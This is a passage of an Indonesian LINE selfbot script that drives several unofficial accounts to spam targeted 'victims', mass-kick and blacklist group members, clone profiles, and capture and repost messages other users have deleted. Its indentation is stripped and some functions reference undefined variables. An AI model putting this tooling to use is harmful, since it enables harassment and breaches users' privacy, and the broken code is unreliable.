audiosOpen = codecs.open("audio.json","r","utf-8")
Setmain = json.load(Setbot)
images = json.load(imagesOpen)
videos = json.load(videosOpen)
stickers = json.load(stickersOpen)
audios = json.load(audiosOpen)
mulai = time.time()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
try:
arrData = ""
ginfo = cl.getGroup(to)
textx = "「 Daftar Member 」\n\n1. "
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "「✭」{}. ".format(str(no))
else:
textx += "\n「 Total {} Member 」".format(str(len(mid)))
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "「 Tukang {} Sider 」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "「 Auto Welcome 」\nHallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+" Di "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
try:
arrData = ""
textx = "「 Respon Leave 」\nBaper Ya Kak ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["leave"]
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
ki.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention2(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kk.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention3(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kc.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention4(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
km.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention5(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kb.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention6(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
sw.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log1():
ndt = datetime.now()
for data in msg_dict1:
if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict1[msg_id]
def atend1():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict1, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def atend():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "• Gunakan「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Me\n" + \
"「✭」 " + key + "Mid「@」\n" + \
"「✭」 " + key + "Steal「@」\n" + \
"「✭」 " + key + "Cover「@」\n" + \
"「✭」 " + key + "Nk「@」\n" + \
"「✭」 " + key + "Kick「@」\n" + \
"「✭」 " + key + "Clone「@」\n" + \
"「✭」 " + key + "Restore\n" + \
"「✭」 " + key + "Reject\n" + \
"「✭」 " + key + "Mybot\n" + \
"「✭」 " + key + "Setting\n" + \
"「✭」 " + key + "About\n" + \
"「✭」 " + key + "Restart\n" + \
"「✭」 " + key + "Runtime\n" + \
"「✭」 " + key + "Creator\n" + \
"「✭」 " + key + "Speed/Sp\n" + \
"「✭」 " + key + "Respontime\n" + \
"「✭」 " + key + "Tagall\n" + \
"「✭」 " + key + "Joinall\n" + \
"「✭」 " + key + "Byeall\n" + \
"「✭」 " + key + "Bye me\n" + \
"「✭」 " + key + "Leave「Namagrup」\n" + \
"「✭」 " + key + "Ginfo\n" + \
"「✭」 " + key + "Open\n" + \
"「✭」 " + key + "Close\n" + \
"「✭」 " + key + "Url\n" + \
"「✭」 " + key + "Gruplist\n" + \
"「✭」 " + key + "Open「nomer」\n" + \
"「✭」 " + key + "Close「nomer」\n" + \
"「✭」 " + key + "Infogrup「nomer」\n" + \
"「✭」 " + key + "Infomem「nomer」\n" + \
"「✭」 " + key + "Joinall「nomer」\n" + \
"「✭」 " + key + "Leaveall「nomer」\n" + \
"「✭」 " + key + "Remove chat\n" + \
"「✭」 " + key + "Lurking「on/off」\n" + \
"「✭」 " + key + "Lurkers\n" + \
"「✭」 " + key + "Sider「on/off」\n" + \
"「✭」 " + key + "Updatefoto\n" + \
"「✭」 " + key + "Updategrup\n" + \
"「✭」 " + key + "Updatebot\n" + \
"「✭」 " + key + "Broadcast:「Text」\n" + \
"「✭」 " + key + "Setkey「New Key」\n" + \
"「✭」 " + key + "Mykey\n" + \
"「✭」 " + key + "Resetkey\n" + \
"\n「 Turn In Media 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Kode wilayah\n" + \
"「✭」 " + key + "Listmp3\n" + \
"「✭」 " + key + "Listvideo\n" + \
"「✭」 " + key + "Listimage\n" + \
"「✭」 " + key + "Liststicker\n" + \
"「✭」 " + key + "Addimg「Teks」\n" + \
"「✭」 " + key + "Dellimg「Teks」\n" + \
"「✭」 " + key + "Addmp3「Teks」\n" + \
"「✭」 " + key + "Dellmp3「Teks」\n" + \
"「✭」 " + key + "Addvideo「Teks」\n" + \
"「✭」 " + key + "Dellvideo「Teks」\n" + \
"「✭」 " + key + "Addsticker「Teks」\n" + \
"「✭」 " + key + "Dellsticker「Teks」\n" + \
"「✭」 " + key + "Spamtag:「jumlahnya」\n" + \
"「✭」 " + key + "Spamtag「@」\n" + \
"「✭」 " + key + "Spamcall:「jumlahnya」\n" + \
"「✭」 " + key + "Spamcall\n" + \
"「✭」 " + key + "Ytmp3:「Judul Lagu」\n" + \
"「✭」 " + key + "Ytmp4:「Judul Video」\n" + \
"「✭」 " + key + "Musik「Nama Penyanyi」\n" + \
"「✭」 " + key + "Get-fs「Query」\n" + \
"「✭」 " + key + "Get-line「ID Line」\n" + \
"「✭」 " + key + "Get-apk「Query」\n" + \
"「✭」 " + key + "Get-gif「Query」\n" + \
"「✭」 " + key + "Get-xxx「Query」\n" + \
"「✭」 " + key + "Get-anime「Query」\n" + \
"「✭」 " + key + "Get-mimpi「Query」\n" + \
"「✭」 " + key + "Get-audio「Query」\n" + \
"「✭」 " + key + "Get-mp3「Query」\n" + \
"「✭」 " + key + "Get-video「Query」\n" + \
"「✭」 " + key + "Get-bintang「Zodiak」\n" + \
"「✭」 " + key + "Get-zodiak「Zodiak」\n" + \
"「✭」 " + key + "Get-sholat「Nama Kota」\n" + \
"「✭」 " + key + "Get-cuaca「Nama Kota」\n" + \
"「✭」 " + key + "Get-lokasi「Nama Kota」\n" + \
"「✭」 " + key + "Get-lirik「Judul Lagu」\n" + \
"「✭」 " + key + "Get-instagram「User Name」\n" + \
"「✭」 " + key + "Get-date「tgl-bln-thn」\n" + \
"\n「 Setting Protection 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Notag「on/off」\n" + \
"「✭」 " + key + "Allprotect「on/off」\n" + \
"「✭」 " + key + "Protecturl「on/off」\n" + \
"「✭」 " + key + "Protectjoin「on/off」\n" + \
"「✭」 " + key + "Protectkick「on/off」\n" + \
"「✭」 " + key + "Protectinvite「on/off」\n" + \
"「✭」 " + key + "Protectcancel「on/off」\n" + \
"\n「 Setting User 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Invite「on/off」\n" + \
"「✭」 " + key + "Sticker「on/off」\n" + \
"「✭」 " + key + "Unsend「on/off」\n" + \
"「✭」 " + key + "Respontime「on/off」\n" + \
"「✭」 " + key + "Timeline「on/off」\n" + \
"「✭」 " + key + "Contact「on/off」\n" + \
"「✭」 " + key + "Autojoin「on/off」\n" + \
"「✭」 " + key + "Autoadd「on/off」\n" + \
"「✭」 " + key + "Welcome「on/off」\n" + \
"「✭」 " + key + "Autoleave「on/off」\n" + \
"「✭」 " + key + "Jointicket「on/off」\n" + \
"\n「 For Admin 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Bot:on\n" + \
"「✭」 " + key + "Bot:expell\n" + \
"「✭」 " + key + "Staff:on\n" + \
"「✭」 " + key + "Staff:expell\n" + \
"「✭」 " + key + "Admin:on\n" + \
"「✭」 " + key + "Admin:expell\n" + \
"「✭」 " + key + "Botadd「@」\n" + \
"「✭」 " + key + "Botdell「@」\n" + \
"「✭」 " + key + "Staffadd「@」\n" + \
"「✭」 " + key + "Staffdell「@」\n" + \
"「✭」 " + key + "Adminadd「@」\n" + \
"「✭」 " + key + "Admindell「@」\n" + \
"「✭」 " + key + "Refresh\n" + \
"「✭」 " + key + "Listbot\n" + \
"「✭」 " + key + "Listadmin\n" + \
"「✭」 " + key + "Listprotect\n" + \
"\nKetik「 Refresh 」jika sudah\nmenggunakan command diatas...\n"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "• Gunakan「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Blc\n" + \
"「✭」 " + key + "Ban:on\n" + \
"「✭」 " + key + "Unban:on\n" + \
"「✭」 " + key + "Ban「@」\n" + \
"「✭」 " + key + "Unban「@」\n" + \
"「✭」 " + key + "Talkban「@」\n" + \
"「✭」 " + key + "Untalkban「@」\n" + \
"「✭」 " + key + "Talkban:on\n" + \
"「✭」 " + key + "Untalkban:on\n" + \
"「✭」 " + key + "Banlist\n" + \
"「✭」 " + key + "Talkbanlist\n" + \
"「✭」 " + key + "Clearban\n" + \
"「✭」 " + key + "Refresh\n" + \
"\n「 Check Settings 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Cek sider\n" + \
"「✭」 " + key + "Cek spam\n" + \
"「✭」 " + key + "Cek pesan \n" + \
"「✭」 " + key + "Cek respon \n" + \
"「✭」 " + key + "Cek leave\n" + \
"「✭」 " + key + "Cek welcome\n" + \
"「✭」 " + key + "Set sider:「Text」\n" + \
"「✭」 " + key + "Set spam:「Text」\n" + \
"「✭」 " + key + "Set pesan:「Text」\n" + \
"「✭」 " + key + "Set respon:「Text」\n" + \
"「✭」 " + key + "Set leave:「Text」\n" + \
"「✭」 " + key + "Set welcome:「Text」\n" + \
"「✭」 " + key + "Myname:「Nama」\n" + \
"「✭」 " + key + "Bot1name:「Nama」\n" + \
"「✭」 " + key + "Bot2name:「Nama」\n" + \
"「✭」 " + key + "Bot3name:「Nama」\n" + \
"「✭」 " + key + "Bot4name:「Nama」\n" + \
"「✭」 " + key + "Bot5name:「Nama」\n" + \
"「✭」 " + key + "Bot1up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot2up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot3up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot4up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot5up「Kirim fotonya」\n" + \
"「✭」 " + key + "Gift:「Mid korban」「Jumlah」\n" + \
"「✭」 " + key + "Spam:「Mid korban」「Jumlah」\n" + \
"\nKetik「 Refresh 」jika sudah\nmenggunakan command diatas...\n"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.updateGroup(X)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = ki.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
ki.updateGroup(X)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kk.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(X)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kc.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(X)
except:
try:
if km.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.reissueGroupTicket(op.param1)
X = km.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = km.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(X)
except:
try:
if kb.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.reissueGroupTicket(op.param1)
X = kb.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kb.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(X)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Sorry anda bukan admin selfbot\nSelamat tinggal " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
km.leaveGroup(op.param1)
else:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kb.leaveGroup(op.param1)
else:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(ABC).cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 15:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
leaveMembers(op.param1, [op.param2])
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
sendMention(op.param1, op.param1, "Haii ", ", terimakasih sudah add saya")
cl.sendText(op.param1, wait["message"])
cl.sendContact(op.param1, "ue6d8f9ef8f820fad9c65bbb5d1ec714b")
if op.type == 5:
print ("[ 5 ] NOTIFIED AUTO BLOCK CONTACT")
if wait["autoBlock"] == True:
cl.blockContact(op.param1)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Gambar Dihapus 」\n• Pengirim : "
ret_ = "• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(at, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
cl.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict[msg_id]["from"])
ret_ = "「 Pesan Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(ryan.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n• Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
cl.sendMessage(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(ryan.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "{}".format(str(msg_dict1[msg_id]["text"]))
cl.sendMessage(at, str(ret_))
cl.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
sw.acceptGroupInvitation(op.param1)
G = sw.getGroup(op.param1)
G.prevenJoinByTicket = False
sw.updateGroup(G)
Ticket = sw.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
G.prevenJoinByTicket = True
sw.updateGroup(G)
wait["blacklist"][op.param2] = True
sw.leaveGroup(op.param1)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.inviteIntoGroup(op.param1,[admin])
else:
pass
if op.param3 in Zmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
